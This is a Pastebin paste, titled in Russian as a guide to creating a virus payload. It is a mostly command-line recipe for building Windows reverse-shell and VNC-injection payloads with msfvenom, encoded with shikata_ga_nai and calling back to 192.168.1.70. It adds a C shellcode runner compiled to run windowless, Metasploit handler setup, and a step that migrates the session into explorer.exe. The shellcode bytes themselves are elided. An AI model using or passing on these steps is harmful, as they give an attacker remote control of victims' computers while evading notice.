Advertisement
Guest User

Untitled

a guest
May 21st, 2018
119
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.47 KB | None | 0 0
  1. 1. Создание файла-вируса(Полезной нагрузки, пэйлоада):
  2. Reverse Shell
  3.  
  4. msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.70 lport=444 -e x86/shikata_ga_nai -i 5 -f c > 444_1_70.c
  5.  
  6. #include <stdio.h>
  7.  
  8. char code[] =
  9. ...
  10. int main(int argc, char **argv)
  11. {
  12. FILE *fp = fopen("c:\\windows\\system.ini", "rb");
  13. if (fp == NULL)
  14. return 0;
  15. fclose(fp);
  16.  
  17. int (*func)();
  18. func = (int (*)()) code;
  19. (int)(*func)();
  20. }
  21.  
  22. mingw32-gcc.exe -mwindows I:\444_1_70.c -o I:\444_1_70.exe
  23.  
  24. msf > use exploit/multi/handler
  25. msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
  26. msf exploit(handler) > set lhost 192.168.1.70
  27. msf exploit(handler) > set lport 444
  28. msf exploit(handler) > exploit
  29.  
  30. sessions l
  31.  
  32. ps
  33.  
  34. migrate ID Explorer.exe
  35.  
  36. VNC-пэйлоад
  37.  
  38. msfvenom -p windows/vncinject/reverse_tcp lhost=192.168.1.70 lport=5900 -e x86/shikata_ga_nai -i 5 -f c > vnc_1_70.c
  39.  
  40. #include <stdio.h>
  41.  
  42. char code[] =
  43. ...
  44. int main(int argc, char **argv)
  45. {
  46. FILE *fp = fopen("c:\\windows\\system.ini", "rb");
  47. if (fp == NULL)
  48. return 0;
  49. fclose(fp);
  50.  
  51. int (*func)();
  52. func = (int (*)()) code;
  53. (int)(*func)();
  54. }
  55. mingw32-gcc.exe -mwindows I:\vnc_1_70.c -o I:\vnc_1_70.exe
  56.  
  57.  
  58. msf exploit(handler) > use exploit/multi/handler
  59. msf exploit(handler) > set paylaod windows/vncinject/reverse_tcp
  60. msf exploit(handler) > set lhost 192.168.1.70
  61. msf exploit(handler) > set lport= 5900
  62. msf exploit(handler) > exploit
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement